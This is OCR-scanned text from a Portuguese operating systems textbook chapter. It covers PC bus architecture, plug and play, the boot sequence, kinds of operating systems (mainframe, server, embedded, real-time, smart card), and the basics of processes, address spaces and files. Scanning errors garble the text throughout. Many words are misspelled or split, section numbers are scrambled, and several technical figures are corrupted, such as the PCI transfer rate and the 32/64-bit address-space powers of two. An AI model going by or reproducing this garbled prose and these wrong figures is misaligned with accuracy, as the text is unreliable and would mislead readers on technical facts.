putadores d u ranie niuitos anos c tombem no fBM PC ori- 
ginal. Contudo, a medida quc os processadores e as memó- 
rias iomavam-se mais rapidos, a capacidade dc um tinico 
barramento fe certamente do barramento IBM PC} tratar 
todo o trafego foi chegando ao limite. Algo deveria ser fei- 
to. Como resultado, barramentos adirionais foram ind in¬ 
dos, tanto para disposilivos dc E/S mais vclozes quanto 
para o trafego entre mcmória c CPU. Como conseąuencia 
dessa evoluęao ( um sistema Pentium avanęadoatuaImente 
se par ccc com a Figura LI 2, 

Esse sistema lem oito barramentos (cache, local mc- 
mória, PCI, SCSI, USB, IDE e ISA), cada um com diferentes 
funęóes e taxas dc tran sferę nci a. 0 sistema operacional deve 
conhece-los hem para eon figura-los e gercncia-los. Os dois 
barramentos prindpais sao o barramento original do IBM 
PC, o ISA (industry standard archikcture — arquitetura-pp- 
drao industrial), e sen sucessor, o barramento PCI {peripheral 
component intcrconnect — iiucrconexao de componentes peri- 
fćricos). O barramento ISA, que foi oiiginalmente o barra- 
meruo do IBM PC/AT, funciona a 8,33 MHze pode transferir 
2 bytes dc urna vez, com uma velocidade maxiiua dc 16,67 
MB/s. Ele e LncUndo para eleito de compalibilidade com as 
placas de E/S antigas e lentas. O barramento PCI foi mven- 
ta do pela Intel para suceder o barramento ISA. Ele pode 
fundonar a 66 MHz e transferir 8 bytes por vez, resultando 
cm urna taxa dc S28 MB/s, A maioria dos dispositivos dc 
E/S de aha veloddade amalmeme usa o barramento PCI. 
Mesmo alguns computadores que nao sao da Intel utilizam 
o barramento PCI em vinude do grandę mi mero de placas 
de E/S disponfveis para ele. Os computadores novos estao 
sendo lanęados com urna vcrsao atualizada do barramento 
PCI cha mada barramento PCI Express. 

Messa configuraęao, a CPU sc comunica com um chip 
'ponte' PCI por meto de um barramento local, e esse chip pon- 
te PCI por sua vez, comunica-se com a meniória por inter- 
medio de um barramento dedicado, freąuenteinente fun- 
donando a 100 MHz. Os sistemas Pentium tern uma cache 
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I Figura 1,12 A estrutura de urn sistema Pentium grandę. 


de nfvel 1 demro do chip e unia ca che de mve!2 muUomaior 
fora do chip, conectada a CPU pelo barramento de cache. 

Alem disso, esse sistema contem tres barramentos es- 
pecializados: IDE, USB e SCSI. O barramento IDE serve para 
acoplar ao sistema dispositivos perifericos como discos e 
CD-ROMs. O barramento IDE e urna extensao da interface 
controladora de discos do PC/AT e atuaimemc conslitui urn 
padrao para disco rigido e muitas vezes tambem para CD¬ 
-ROM em quase todos os sistemas baseados em Pentium. 

0 USB (unmrsal serial bus — barramento serial uni- 
vcrsal) foi hwentado para concctar ao computador todos 
os dispositivos lentos de E/S, como teclado c niouse. Ele 
Lisa um peąueno conector de quatro vias; duas delas fonie- 
cem alimcoiaęao aos disposiUvos USB. O USB ć um barra¬ 
mento centra li za do no qual um dispositivo-raiz inteiroga 
os dispositivos de E/S a ca da i ms para verificar sc eles 
tern algo a ser transmitido. Ele pode tratar urna carga acu- 
mulada de 1,5 MB/s, mas o mais novo USB2.0 pode tratar 
60 MB/s. Todos os dispositivos USB compartilham um uni- 
co driverde disposilivo USB, tornando desnecessario insLa- 
tar um novo drivcr para cada novo dispositivo USB. Consc- 
ąuentemeiite, os dispositivos USB podem ser adirionados 
ao computador sem predsar remicia-io, 

O barramento SCSI (smal! Computer system interface — 
interface de peąueno sistema dc computador es) ć um bar¬ 
ramento dc aito desempenho destinado a discos rapidos, 
scanners e otitros dispositivos quc predsem de considera- 
vel largura de banda. Pode funcionar em a te 160 MB/s. 
Esla presente em sistemas Macintosh des de guando foram 
lanęados c tambem c popular cm sistemas UNIX c cm al- 
guns sistemas baseados na Intel. 


Gutro barramento (que na o esta ilustrado na Figura 
J .12) e o IEEE 1394. As vezes cle e chama do de FireWire— 
embora FireWire seja o nonie que a Apple usa para sua 
implementaęao do 1394. Do mesrno modo que o USB, o 
IEEE 1394 e serial em bits, mas destinado ci transferenria 
de pacotes em vdocidades dc atc 100 MB/s r tornando-o 
util para conectar ao computador cameras digitais e dispo- 
sitivos multimidia similares. Ao contra ii o do USB, o IEEE 
1394 nao tern um controlador central 

Para funcionar em um ambieme como o da Figura 
1.12, o sistema operacional deve saber o que ha nele e 
eon figu ra-lo, Esse reąuisito lcvou a Intel e □ M icrosoft a 
projetarem um sistema para o PC denominado pług and 
play, baseado cm um conccito similar implcmemado pcla 
primcira vez no Macintosh da Apple. Antcs do ping and 
play, cada płaca de E/S lin ha um nivcl fixo de reąuisięao de 
interrupęao e endereęos especfficos para seus registradores 
de E/S. Por exemplo, o teclado era a interrupęao 1 e usava 
os endereęos de E/S entre 0 x 60 e 0 x 64; o controlador 
de disco flexivd era a interrupęao ó e usava os endereęos de 
E/S entre 0 x 3F0 c 0 x 3F7; a impressora era a interrupęao 
7 e usava os endereęos dc E/S entre 0 x 378 e 0 x 37A etc. 

Ate aqui, tudo bem, O problema comeęava ąuando o 
usuario trazia urna płaca de som e urna płaca de modem e 
ocorria de a mb as usarem, digamos, a interrupęao 4. Elas 
conflitariam e nao fundonariam juntas. A soluęao era im 
cluir chaves DIP ou junipers em todas as placas de E/S e 
lustru i r o usuario a configu ra-las selecionando um nivel 
de interrupęao e endereęos dc dispositivos dc E/S que nao 
conflitasscm com quaisqucr outros no sistema do usuario. 
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Adolescentes que devoiavam suas vidas as compIexidades 
do hardware do PC podiam faze-Io, as vezes sem cometer 
crros. Infelizmente, nem todos tinham esse know-how, o 
que levava ao caos. 

O pług and play faz, com que t> sistema cole te automa- 
ticameme informaęoes sobre dispositivos de E/S, atribua 
de maneira cemralizada os mveis de interrupęao e os en- 
derecos de E/S e informe ca da płaca sobre quais sao seus 
numeros. Esse trabałho esta estreitamente relacionado a 
inidalizaęao do computador, por isso vamos examina-lo. 
Nao se trata dc algo completamente trivial, 

1-5-71 Inicializando o computador 

Multo resnmidamente, oproccsso de iniciaęao no Pen- 
ii urn fundona da scguinte maneira: todo Pentium contem 
utną płaca geral, denominada placa-mae. Nela localiza- 
-se urn programa denominada BIOS {basie iitptrt ourpur sys¬ 
tem — sistema baśko de E/S). O BIOS coma com rolinas de 
E/S de ba txo nfvcL para ler o te da do, cscrever na tda, tea- 
lizar a E/S no disco etc* Alualmente, de lica cm urna flash 
RAM, que e nao volatil, mas quc pode ser atualizada peło 
sisicma operationai se erros forem cncontrados no BIOS. 

Quando o computador e inicializado, o BIOS comeęa a 
execuiar. Ele primeim verifica ąuanta memoria RAM esta 
insialada e se o tedado e outros dtsposiiivos basteos estao 
instalados e respondendo corretamenie. Ele segue varren- 
do os barramemos ISA e PCI para detectar todos os dis- 
posilivos coiiectados a des, Alguns desses dispositivos sao, 
cm geral, legados (legacy, isto e, projetados antes que o 
ping and play tive$se sido inventado) c tern nfyeis de inter¬ 
rupęao c cndercęos dc E/S fixos (possivdmente eon figu ra - 
dos por chaves ou jumpers na płaca dc E/S, mas nao mo- 
dificaveis pdo sisicma operacional). Esses dispositivos sao 
gravados, assim como os dlspositivos pług and play. Se os 
disposilivos presentes se mostrarem diferentes de quando o 
sistema fol iiiicializado pela ultima vez, esses novos disposi- 
tfvos serao configurados. 

O BIOS delermina entao o dispositivo dc inidalizaęao 
(boot) percoiTcndo unia lista de dispositivos armazenados 
na memoria CMOS. O usuario pode alterar essa lista en- 
trando em um programa de configu raęao do BIOS logo de- 
pois da inidalizaęao. Normalnienie, urna temativa e feita 
para inicializar a partir do disco flexiveL Se isso falha, e ten- 
lado o CD-ROM. Se nem o disco flexivel nem o CD-ROtM 
estiverem presentes, o sistema sera inicializado a partir do 
disco ngido. O primeiro setor do dispositivo dc iniriahza- 
ęao e transferido para a memoria e executado. Esse setor 
contem um programa que, cm geral, examina a tabela dc 
partięóes no finał do setor de inidalizaęao para delerminar 
qual partięao esta ativa, Entao, um carregador de iniciali- 
zaęao secundario e lido daqu da partięao, Esse carregador 
le o sistema operacional da panięao aitva e, entao, o inicia. 

O sistema operacional consulta o BIOS para obter a 
informaęao dc eon figura ęao. Para cada disposltivo, ele vcri- 


fka se ha o driver do dispositivo. Se nao houver, ele pedira 
para que o usuario insira um disco flexivd ou um CD-ROM 
contendo o driver (fornecido pelo fabricante do dispositi- 
vo). Urna vez que todos os dnvers dos dispositivos estejam 
dispomVeis, o sistema operacional carrcga-os dentro do 
nuclco, Entao dc inidaliza suas tabelas, cria proccssos cm 
background — sc forem necessarios — c inicia um progra¬ 
ma de identificaęao ou urna interfacc grafica GUI, 



O zoológico de sistemas 
operacionais 


Os sistemas operacionais existem ha inais dc 50 anos. 
Durante esse tempo, urna grandę variedade deles foi de- 
senvolvida, nem todos bem conhecidos. Nesta seęao falare- 
mos resnmidamente sobre nove deles. Mais adiame, volia- 
rent os a abordar algims desses diferentes ripos de sistemas. 


_ 1.4.11 Sistemas operacionais de 

computadores de grandę porte 

No topo esiao os sistemas operacionais para compu¬ 
tadores dc grandę porte — aąudes quc ocupam urna sala 
iiiteira, ainda encontrados em centros de da dos de grandes 
corporaęoes, Esses computadores distinguem-se dos com¬ 
putadores pessoais em termos de capacidade de E/S, Um 
computador de grandę porte com mil discos e milhares de 
gigabytes de dados nao e incomum; um computador pessoal 
com essas espedficaęoes seria algo singular. Os computa¬ 
dores de grandę porte tambem estao ressurgindo como so- 
fistkados servidores da Web, como servidores para sites de 
comercio clctrónico cm larga escala e, ainda, como servi- 
d orc s pa ra t ra nsa cocs en t rc c mpres a s {business - to-b ustness ). 

Os sistemas operacionais para computadores de gran¬ 
dę porte sao sobretudo orientados para o processamento 
simultaneo de muitas tarę fas, e a maioria deles predsa de 
quantidades prodigiosas de E/S. Esses sistemas operacio¬ 
nais normalincnte oferecem tres tipos de servięos: em Jotę 
(batch), processamento de transaędes e tempo compartilha- 
do. Um sistema em lote processa tarefas de rotina sem a 
presenęa intcrativa do usuario, O processamento dc apóli- 
ccs dc u ma companhia dc seguros ou de relatórios de vcn- 
das de urna ca de i a de lojas e, em geral, realizado em modo 
kile. Sistemas de processamento dc transaędes administram 
grandes quantidades de peąuenas requisięóes — por exem- 
plo, processamento de verifvcaęoes em um han co ou em 
reservas de passagens aereas. Cada unidade de trabałho e 
pequena, mas o sistema precisa tratar centenas ou milhares 
delas por segundo. Sistemas de tempo compartilliado per- 
niitem qne mul tipi os usuarios re molos ex ecu tern suas ta- 
refas simulianeamente no computador, como na realizaęao 
dc consultas a um grandę banco de dados. Essas iunęoes 
estao intimamente relacionadas; sistemas operacionais de 
computadores de grandę porte muitas vczes realizani todas 
clas. Um cxcmplo dc sistema operacional dc computador 
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de grandę porte e o OS/390, nm descendente do OS/360. 
Ent ret anto, os sistemas operadonais de computadores de 
grandę porte estao sendo gradualmente substitiifdos por 
variantes do UN1X, como o Linux. 

1-4.21 Sistemas operacionais de senridores 

Urn nrvel abaixo estao os sistemas operadonais de ser- 
vidore$, Hles sao exeauados em semdores, quc sao co to¬ 
pu lado res pessoais muiio gran des, em estaęoes de Irabalho 
ou ale mesmo em compntadores de grandę porte- Eles ser- 
vem mnlliplos usuariosde unia vcz cm urna redo e pcrmi- 
icm-lhes companilhar rccursos dc hardware e de software. 
Servidores podern fornccer scrvięos de impressao, de ar- 
quivo ou de Web. Provcdores dc accsso a Internet ubliżam 
varias maquinas semdoras para dar suportc a seus clientes 
e sites da Web u sam servidores para armazenar paginas e 
tratar reąuisięoes que chcgam. Sistemas operadonais tipi- 
cos de servidores sao Solaris, FreeBSD, Linux e Windows 
Server 200x. 

_ 1.4.31 Sistemas operacionais de 

tmiltiprocessadores 

Urn modo cada vez mais eoinum de obter poteneia 
computacional e eonectar miiltiplas CPUs em urn unico 
sisiema. Dependendo precisamenie de como elas csiive- 
rern conectadas e o que e com parł i Iliado, esses sistemas sao 
tknominados compntadores paralelos, multicomputadores 
ou mulliprocessadores. Elas p red sam de sistemas operacio¬ 
nais especiais, mas muitos deles sao yariaęoes dos sistemas 
operacionais de semdores, com aspeaos especiais de co- 
mumcaęao, conectividade e compatibilidade. 

Com o advento recentc de chips multinudco para 
compntadores pessoais, ale sistemas operadonais de com- 
putadores de mesa e de noicbooks estao comcęando a iidar 
com, no mi ni ino, mulliprocessadores de peąuena escala c e 
provavel que o mi mero de nucie os cresęa com o tempo. Fe- 
lizmeme, sabc-se basta nie sobre sistemas operadonais de 
mulliprocessadores como conseąuencia de anos dc pesąui- 
sas anteriores; desse modo, aplicaresse conhecimento a sis- 
temas mu lii nu ci co nao deve ser diffcil* A parte diffcil seria 
fazercom que as aplicaęoes usassem todoesse poder de com- 
puLaęao. Muitos sistemas operacionais populares, mdttsive 
Windows e Linux, sao executados com mulliprocessadores. 

_ 1.4.41 Sistemas operacionais de 

computadores pessoais 

A categoria seguime e o sistema operadonal de com¬ 
putadores pessoais. Os computadores modernos dao su- 
porte a multiprogramaęao, muitas vezes com dezenas de 
programas inidados. Seu traballio e oferecer unia boa ui- 
terface para um unico usuario, Sao amplamente usados 
para processadorcs de tcxto, płanilhas c accsso a Internet. 
Excmplos comims sao Linux, FrecBSD, Windows Vista c o 


sistema operadonal do Macintosh. Sistemas operacionais 
de computadores pessoais sao tao amplamente conheridos 
que e provavel que predsem, aqul de pouca introduęao. 
Na verdadc, muitas pessoas nem mesmo sabem da existen- 
da de outros tipos dc sistemas operacionais. 

1.4.51 Sistemas operacionais de 
computadores portateis 

Seguindó em direęao a sistemas cada vez menores, 
chcgamos aos computadores portateis. Um compulador 
portatil ou assistente pessoal digital (personal digital as- 
sistant — PDA) e um pcqucno computador que cabe no 
bolso dc uma camisa c exeaua um nu mero pequeno de 
funęoes, como agenda de endereęos e bloco de anotaęocs. 
Alem disso, muitos iclefones ceiulares apresemam peque- 
nas diferenęas em rdaęao aos PD As, exceto pelo ledado e 
pela iela. De lato, PD As e tclefones ceiulares basica menie 
$e fundiram, diferindo pi ind pal nieme em ta mar ho, peso 
e intcrfacc com o usuario. Qua$e todos ci es sao baseados 
em CPUs de 32 bils com modo protegido e exccutam um 
sistema operadonal sofislicado. 

Os sistemas operacionais executados nesses computa- 
dores portateis sao cada vez mais sofisticados, com a capa- 
ddade dc manipular telefonia, fotografia digital e om ras 
funęoes. Muitos deles lambem execmam aplicaęoes de 
lerceiras parłeś. De falo, alguns deles estao co me ca rui o 
a se pareccr com sistemas operacionais de computadores 
pessoais de uma dćcada atras. Unia dilerenęa imperia me 
entre portateis c PCs e que os primeiros nao tern discos 
rigidos muttigigabyte, o quc faz muita difercnęa, Dois dos 
sistemas operacionais para portateis mais populares sao 
Symbian OS e Palm OS. 

1.4.61 Sistemas operacionais embarcados 

Sistemas embarcados sao executados cm computa- 
dores que controlam disposilivos que geralmente nao sao 
considerados computadores e quc nao aceilam soflwares 
instalados por usuarios, Exemplos tipicos sao fornos de 
micro-ondas, aparelhos de TV, carros, aparelhos de DVD, 
tclefones ceiulares c reprodutores dc MP3. A pmpriedade 
Principal que distingue os sistemas embarcados dos porta- 
teis e a certeza de que nenhum software nao confiavel ja- 
mais sera executado nde. Vocc nao pode baixar novas apli- 
caęocs para scu fonio dc micro-ondas — todo software esta 
no ROM. tsso significa quc nao ha necessidade dc protcęao 
entre as aplicaęócs, icvando a algumas simpiificaęoes, Sis- 
leirsas como QNX e Vx Works sao populares nesse dom mi o. 

_ 1-4-71 Sistemas operacionais de nos 

sensor es (sensor node) 

Rcdes de nos sensores mmusculos estńo sendo empre- 
gadas com iniimeras finalidades. Esscs nos sao compiita- 
dores minusculos quc sc comunicam entre si c com unia 
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estaęao-base usando comunicaęao sem fio. Essas redes de 
sensores sao utilizadas para proteger os perfinetros de pre- 
dios, guardar fronteiras nacioriais, detectar incendios em 
Morestas, medir temperatura e mveis de predpitaęao para 
previsao da tempo, colher informaęócs sobre movimentos 
dos inimigos em campos de batalha e muito mais. 

Os sensores sao computadores pequenos movidos a 
bateria com radios in te gra dos. Eles tem energia limitada 
e devem funcionar por longos perfodos de tempo, sozi- 
nhos ao ar livre, frequentemente em condięóes ambien- 
tais severas. A rcde deve ser robusta o suficiente para 
tolerar fałhas de nos individuais, o que acontecc com 
freąuenria ca da vcz maior a medida quc as baterias co- 
meęam a sc csgotar . 

Gada no sensor e um verdadeiro computador, com 
CPU, RAM, ROM e um ou mais sensores ambiemais. Exe- 
cuta um pequeno sistema operadonal próprio, normal- 
mente dirigido por cvcntos, reagindo a evemos extemos 
on obtendo medidas periodicamente com base em um rc- 
lógio interno, O sistema operadonal leni dc ser peąueno c 
simples porąue os nos tein RAM pequcna c a duraęao da 
bateria e urna qucstao impoitanle. Alem disso, tal como 
nos sistenias embarcados, todos os programas sao carrega- 
dos antecipadameme; os usuarios nao inidam repemina- 
menie os programas que baixaram da Internet, o que torna 
o projeto muito mais simples. O TinyOS e um sistema ope- 
racional muito conliecido para nos sensores. 

1 >4.81 Sistemas operadonais de tempo reai 

Outro tipo de sistema operadonal e o de tempo real. 
Esses sistemas sao caraetcrizados por terem o tempo como 
um parametro fundamentaL Por cxemplo, em sistemas dc 
contro]c de proccssos industriais, computadores de tempo 
real deveni coletar da dos sobre o processo de produęao e 
usa-los para controlar as maguinas na fabrica. fi bastan- 
ic comum a existencia de prazos ngidos para a execuęao 
de determinadas tarefas. Por exemplo, se um carro esta se 
movendo por urna lin ha de montagem, certas aęoes devem 
ser realizadas etn momentos cspecilicos, Se um robo solda- 
dor realizar seu traballio — soldar — muito cedo ou muito 
tarde, o carro es tara perdido* Se as aęoes predsam necessa- 
ria menie ocorrer em determinados insiantes (ou em um 
determinado intervalo de tempo), Łem-se en tao um siste¬ 
ma de tempo real cntico. Muitos deles sao encomrados 
no comrole de proccssos industriais, ayionica, exerdto e 
areas de aplicaęao semclhantes. Esses sistemas devem for- 
necer garantia absoluta dc quc determinada aęao ocorrcia 
em determinado moment o, 

Outro tipo de sistema de tempo real e o sistema de 
tempo real nao cntico, no quał o descumprimento oca- 
sional de um prazo, embora nao desejavel, e aceitavel e 
nao causa nenhum dano permanente. Sistemas de audio 
digital ou multimfdia pertcnccm a cssa categoria. Telcfoncs 
digitais tambem sao sistemas dc tempo real nao cnticos. 


Urna vez que cumprir prazos rigorosos e crucial em sis¬ 
temas de tempo real, algumas vezes o sistema operadonal 
e simplesmente urna biblioteea concctada com os progra- 
mas aplicativos, em que tudo esta rigorosameme acoplado 
c nao ha proteęao entre as partes do sistema. Um exemplo 
desse tipo dc sistema cm tempo real c c-Cos. 

As categorias de sistemas porta leis, embarcados e de 
tempo real se sobrepoem de modo consideravel. Quase to- 
das elas tein pelo menos alguns aspectos de tempo real. 
Os sistemas embarcado e de tempo real executam apenas 
softwares colocados pelos projetistas do sistema; os usua- 
rios nao podem acrescentar scus próprios softwares, o quc 
fadlita a proteęao. Os sistemas portatds e embarcados sao 
planejados para consumidorcs, ao passo que sistemas de 
tempo real sao niais direrionados ao uso industrial. Entre- 
tania des tem algumas coisas em comum, 

_ 1.4.91 sistemas operadonais de cartóes 

inteligentes (smart cards) 

Os menores sistemas operadonais sao execuvados em 
eartoes i nieligentcs — disppsitivos do ta ma n ho dc cartoes 
de credito que cantem um chip de CPU. Possuem grandes 
restrięoes de consumo de energia e de memória.Alguns de¬ 
les obtem energia por comatos com o leitor cm que estao 
inseridos, porem, os cartóes inteligentes sein contato ob¬ 
tem energia por induęao, o que Mmi ta muito aąuilo que 
podem rcalizar. Alguns deles podem real Iza r apenas urna 
unica funęao, como pagamentos ele tron [cos, mas outros 
podem gerendar multiplas fuuęócs no mesmo ca na o inte- 
ligente. Sao comumenie sistemas proprietarios. 

Alguns cartoes inteligentes sao orientados a Java. Isso 
signifka que a ROM no eartao inteligeme eon tern um 
interpretador para a maąuina virtual Java (Java virtmf 
machinę — JVM). As pcąuenas aplicaęóes Java (applcts) 
sao earregadas no eartao e interpretadas pda JVM. Al¬ 
guns desses cartoes podem tratar mukiplas applets Java ao 
mesmo tempo, acarretando multiprogramaęao e a conse- 
quente necessidade de escalonamento. O gerenciainento 
de recursos e a proteęao tambem sao um problema quando 
duas ou mais applets estao presentes simultaneamente. Es¬ 
ses problemas devem ser tratados pelo sistema operadonal 
(normalnienie muito primitivo) contido no eartao. 



Conceitos sobre sistemas 
operadonais 


A maioria dos sistemas operadonais fornece cenos 
conceitos e abstraęóes basicos, como processos, espaęos 
de endereęamento e arqulvos, que sao fundamentais para 
entende-los. Nas próximas seęóes, veremos alguns desses 
conceitos basicos de modo bastante brcve, como unia in- 
troducao. Voltaremos a cada um deles detalhando-os neste 
livro. Para i lustra r esses conceitos, dc vcz cm quando usarc- 
mosexcmplos, gera 1 ment c ti ra d os do U NI X + Gont u do, exem- 
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plos similares normalmente existem para outros sistemas. 
Estudaremos o Windows Visfa em detalhes no Capitulo 1 \. 

_ 1.5.11 Processos 

Um conceito fundamenta] para todos os sistemas ope- 
raćonais e o de processo. Urn processo e basicameme urn 
pr ogra ma em execugio. Associado a cada processo esta o 
seu espaęo de endereęamento, u ma lista de pasięocs dc 
memória, quc vai de 0 ate urn maximo, que esse proces¬ 
so pode ler c escrever. 0 espaęo dc endereęamento conteni o 
programa execuiavel os dados do programa e sua pilha. 
Tambem associado a cada processo esta um conjunto dc 
retursos, normalmente indu indu registradores (puc in- 
clucin o contador dc programa e o pontciro para a pilha), 
unia lista dos arquivos abertos, alarmes pendenies, listas 
dc processos relacionados c todas as demais informaęoes 
necessarias para executar urn programa. Um processo e 
funda men ta lniente um conteiner que annazena todas 
as informaęoes necessarias para executar um prograrna. 

Retomaremos, no Capitulo 2, o conceito de processo 
com inuito mais detalhes; por ora, o modo mais facil de 
intuitivammte entender nm processo ć pensar em sistemas 
de rmdtiprogra magio. O nsuario pode ter i ni da do um pro- 
grama de edięao de vfdeo e o instruido para converter um 
vfdcode unia hora para um determinado formato (algoque 
pode lcvar horas) e, a seguir, comcęar a navegar na Web. 
Enquanto isso, a execugio de um processo de fundo su- 
bordinado que desperta periodicameme para vcrificar os e- 
-niails quc chcgam pode ter sido inidada. Dcssc modo, ic- 
nios (pelo menos) tres processos ativos: o editor dc vfdeo, o 
navegador da Web e o receptor dc e-inaiL Periodicameme. 
o sistema operacional decide pararde executar um processo 
e inidara execuęao de outro porque, porexemplo, o primei- 
ro havia excedido seu tempo de compartilhamemo da CPU. 

Quando um processo e suspenso tempprariameme 
dessa maneira, ele devera ser reiniciado mais tarde, exa- 
tamente do mesmo porno em que estava quando fol inter- 
rornpido. Isso śigmftca que todas as informaęoes relaiivas 
ao processo devem estar explidtamemc salvas em algum 
Jugar durante a suspensa o. Por exemplo. u ni processo pode 
ter, ao mesmo tempo. varios arquivos abertos para kitura. 
£xislc urn ponteiro, associado a cada um desses arquivos, 
que indica a posięao atual (isto e, o mimero do próximo 
by te ou registro a ser lido). Quando um processo ć sus¬ 
penso temporariamente, todos csses ponteiros devem ser 
salvos de forma que urna cha mada nead, execiuada após o 
reimcio desse processo, possa ler os dados corretamente. 
Em muitos sistemas operadonais. todas as informaęoes re- 
lativas a um processo — que nao sejam o conlcudo de seu 
próprio espaęo de endereęamemo — sao a rm a ze nad as em 
inna tabela do sisiema operacional denominada tabela de 
processos, quc e um arranjo (ou urna lisia encadeada) dc 
estruturas, urna para cada processo existeme. 

Assim, um processo (suspenso) e constkmdo de seu 
espaęo dc endereęamento, normalnienie chamado de ima- 


gem do niideo (em homenagem as memórias de nucleo 
magnetico usadas anligamente). e de sua entrada na tabela 
dc processos, a qual armazena o conteudo de sens registra- 
dores, entre outros itens necessarios para relnidar o processo 
mais tarde. 

As principais chamadas de sisiema de gerenciamen- 
to de processos sao aquelas que lidam com a criaęao e o 
termino de processos. Considere um exemplo tfpico: um 
processo denominado interpretador de eomandos ou 
shell le os comandos dc um terminal. O nsuario acaba 
de digiLar nm comando pedindo que um programa seja 
eompilado. O shell deve emao criar um novo processo. 
que executara o compilador. Assini que esse processo tiver 
terminado a compilaęao, ele executa unia chamada desis- 
tema para se auiofinalizar. 

Se um processo pode criar um ou mais processos (cha- 
mad os processos filhos), e se esses processos, por sua vez, 
puderem criar outros processos ftllios, rapidamente cliega- 
remos a urna estrutura de arvores como a da Figura LI3, 
Processos relacionados que estiverem cooperando para 
executar alguma tarda precisamfrcquentememe sc comu- 
nicar um com o outro c sineronizar suas atmdadcs. Essa 
comunicaęao e chamada de comimicaęao entre proces¬ 
sos e sera analisada no Capitulo 2. 

Outras diamadas de sistema permitem requisitar mais 
memória (ou liberar memóha sem uso), esperar que um 
processo fil ho termin c e sobrepor (owrlay) seu programa 
por outro di Terenie. 

Gcasionalmente, ha a necessidade de levai urna in- 
formaęao para um processo em execugio quc nao esteja 
esperancie por essa informaęao. Por exemplo, um proces¬ 
so quc esta se comunicando com outro processo em outro 
computador envia mensagens para o processo remoto por 
intermedio de urna rede de computadores. Para se preve- 
nir contra a possibilidade de que uma men sagę m ou sua 
resposta se perca, o processo emissor pode iequisitar que 
seu próprio sistema operacional notifique-o após um deter- 
minado nu mero de segundos, para que possa retransmttir 
a mensagem se nenhuma confinnaęao {acknowkdgment) 
enviada pelo processo receptor tiver sido rc cc bida. Depois 
de ligar esse temporizador, o programa pode ser retomado 
e realizar outra tarefa. 



I Figura 1.13 Urna arvore de processo. O processo A 
crion dois processos filhos, B e C, O processo & criou tres 
processos filhos, D, E e F. 
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Decorrido o numera espedfkado de segundos, o sis- 
lema operacional avisa o processo por meio de um sinal 
de alarrae. Esse smal faz com que o processo suspenda 
temporariamente o que estiver fazendo, salve seus regis- 
tradores na pilha e inicie a execuęao de unia rotina espedal 
para tratamento desse sinal — por exempIo, para rctrans- 
mitir urna mensagem presiirmvdrnentc perdida. Quando 
a rotina de trata men to desse sinal ter mi na, o processo em 
execuęao e reinidado a partir do mesmo porno em que 
estava logo a mes de ocorrer o sinal. Sinais sao os analo- 
gos em software das interrupędes em hardware e podem 
ser gerados por diversas causas alem da expiraęao de u ni 
temporizador. Mn i t as armadilhas detectadas por hard¬ 
ware — como tentar executar uma instruęao ilegal on usar 
um endereęo invalido — tambem sao convertidas em sinais 
para o processo causa dor. 

A cada pessoa autorizada a usar um sistema e atribui- 
da unia UID (user Identification — idcntifkaęao do usuario) 
pdo ad ministra dor do sistema. Todo processo iniciado tein 
a UID de quem o iuiciou, Um processo fllho tern a mes ma 
UID de seu processo par Os usuarios podem ser membros 
de grupos, cada qual com urna GID tyroup identifiwtm — 
idemificaęao do grupo). 

Uma UID, denominada super usuario (em UNXX), 
tem po der cs espedal s e pode violar mu i las das regras dc 
protcęao. Em grandes instalaęóes, semenie o ad mi nistra- 
doi do sistema sabe a sen ha necessaria para se toina r um 
supCTusuirio, mas muitos usuarios comuns (esperialmcnte 
estudantes) fezem dc tudo para cncontrar falhas no sistema 
quc Ihes permitam tomarem-se superusuarios sem a senha. 

Estudarcmos proccssos, comumcaę6e$ emrc proccssos 
e assmitos reladonados no Capftulo 2. 

1-5.21 Espacos de enderecameiito 

Todo computador tem alguma memória principal que 
utiliza para armazenar programas em execuęao. Em um 
sistema operacional muito simples, apenas urn programa 
por vez esta na memória. Para executar um segundo pro- 
grama, o primciro tem dc ser reinovido c o segundo, colo- 
cado na memória. 

Sislemas operacionais mais sofisticados permitem que 
mtiltiplos programas estejam na memória ao mesmo tem¬ 
po. Para impedi-los de interferir na atMdade uns dos ou- 
tros (e com o sistema operacional), algum tipo dc mecanis- 
mo de proteęao ć necessario. Embora esse niecąnismo dcva 
estar no hardware, ć comrolado pclo sistema operacional 

O porno de cista apresentado ameriormente diz respei- 
lo ao gerenciamento e a proteęao da memória principal do 
computador. Um tema diferente reladonado a memória, 
mas igualmente importante, e o gerenciamento do espa¬ 
ęo dc endereęamento dos proccssos. Normalnienie, cada 
processo tem um conjunto de endereęos que pode mi li¬ 
żą r, gcralmcntc indo dc O atc alguma ąuantidadc maxitna. 
No caso mais simples, a ąuantidadc maxima dc cspaęo dc 


endereęametuo qne um processo tem e menor que a me- 
mória principal. Dessc modo, um processo pode preencher 
todo seu espaęo de endereęamento e havera espaęo sufi- 
ciente na memória para armazena-lo completamente. 

C on tu do, em rnuUos computadores os endereęos sao 
de 32 on 64 bits, dando um cspaęo de endereęamento de 
2 12, ou 2^ bytes, respectiva menie* O que a eon tece se um 
processo iiver maior espaęo de endereęamento que a me¬ 
mória principal do computador e o processo qu iser u liii- 
za-lo compietamenie? Nos primeiros compuiadores, esse 
processo nao lin ha sortc. Atualmcnie, existc uma tecnica 
chamada memória vinual, como mencionado amerior- 
menie, na qual o sistema operacional mantem parte do 
cspaęo dc endereęamento na memória principal c parte no 
disco, trocando os pedacos entre eles conforme a necessida- 
de. Em essenda, o sistema operacional cria a abstraęao de 
um espaęo de endereęamento como o conjunto de endere¬ 
ęos ao qual um processo pode sc referir, O processo de cn- 
dereęamento e dcsacoplado da memória fisia da maquina 
e pode ser maior ou menor quc a memória fisica. O geren¬ 
ciamento de espaęos de endereęamento e da memória fisi¬ 
ca forma uma parte importantc das atwidades do sistema 
operacional; por isso, o Capftulo 3 c dcdicado a esse top i co. 

1-531 Arquivos 

Outro conceito funda men tal que compoe pra lica menie 
todos os sistemas operacionais e o sistema de arqtiivos. Como 
sc observoti antenormente, urna das principais funęóes do sis- 
tema operacional e oailtar as pecuBaridades dos discos e de 
ouiros disposilivos de E/S, fornecendo ao programador um 
model o de arquivos agradavel e dato, independentemenie de 
dispositiYos. Chamadas de sistema sao obviameme necessa- 
rias para criar, remover, ler e escrever arqiiivos, Antes que 
possa ser lido, um arquivo deve ser ioealizado no disco, aberio 
e, depoisde lido, ser fechado. Dessc modo, chamadas dc siste¬ 
ma sao fomeddas para fazer essas tarefas. 

Para ter um iocal para guardar os arquivos, a maio- 
ria dos sistemas operacionais foniece o conceito dc dire- 
tório como um modo de agmpar arqiiivos, Um estudan- 
te, por excmplo, pode ter um diretório para cada curso 
que dc estiver fazendo (para os programas necessarios 
aqude curso), outro diretório para seu correlo eietro- 
